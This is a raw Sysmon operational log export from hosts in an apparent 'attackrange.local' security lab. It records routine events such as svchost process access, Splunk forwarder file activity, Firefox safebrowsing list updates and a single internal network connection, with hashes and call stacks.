07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001050065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8403A8FCA015A2DC94B9228E4B00498,SHA256=DBF326C2195EBB237F748C57052122D2D969159FA361B4AE2700E779C8B1B867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126AE4FAEC14A9E810730428633B7796,SHA256=8B59E6D137B2147BF1E76D313ECCDE26000FBDC036CF0054922D7AF06144785F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.604{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8F1AF05E946BCD9711A1CDE1B1ED6C95,SHA256=0F5C8864E17307F3C8CE1D35AC4770D0C1C34F8CDB3FC7404F2114B4E0FD93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B91E9842F81EE5668B68C0B5B561010A,SHA256=19F7DFB5FC8E587C8D48DC8A779B07E1C11CCD772A7B68025146FF0A335B54CB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6CBD94D3D2878BBE7EE0E707A97C3307,SHA256=F3B68CF7458532B88D77ECF652721AE743D4E7C60A8D44D16872158E66E9D903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.573{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=4A2609D475F48638235EF3C1EE4607CE,SHA256=92D645E1E20A16E63907890C21B99C8AEEBFAA920DA9E7663C43E259886FBAA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.573{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1D05EADF8B5987C12351E95499404B05,SHA256=1E4CD89907C8B6E7314B8D0267A44347017F93A61A13548402B10B4F5EA1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:11.233{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:12.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8F0FEBD80E07F9ED38043AAAED3E653,SHA256=41E9E538584935CEE7157F3993C8EF8F0EFA3B5D8128F87125361448AEB1AD22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=5AE80998F1A6D08F1791EAD23EDC7405,SHA256=0F8E615DE60E94815B231AA748BE551BE5D060509466CB948A93917C0BF87618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=5AD4772D4BE6E9CC7CFA00B64B6CE71A,SHA256=C324FCF91D4B541EB93422BDD5FA434E39A752B6D7A93D78E70472F6D9B1EF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=33287B256C94A051C011EB4B2777550C,SHA256=FF74549543054CC5BEA457049650367960DA1D6D66566B77E4FFE206F14C1D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=5ACD66DB29AFABE23566110E44DBD5E7,SHA256=AD73B565DED09760945E8AC426CD4D16C8DEB3C202E8ABAD356EABF62137D2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=3B53A80D80584F5F16860FB04FBBB50C,SHA256=578B167D678436BE970332CB1F2B38D237BBFD6DAF46C2D565F0A457F7C00D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=F0A0E73AB1563D94300A5FF98A4D4EC8,SHA256=F5523B366C6D20A56064595DB6D6150FA814E3021915E09865FB2F0D8D50B93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001050039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=035827BEC3ADE90E76BA3AEDC96358AD,SHA256=4EAF96227DE73BFE63800037F56C081F7F12A7BE5BCC1299A2B87FCDD6BFE7D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 
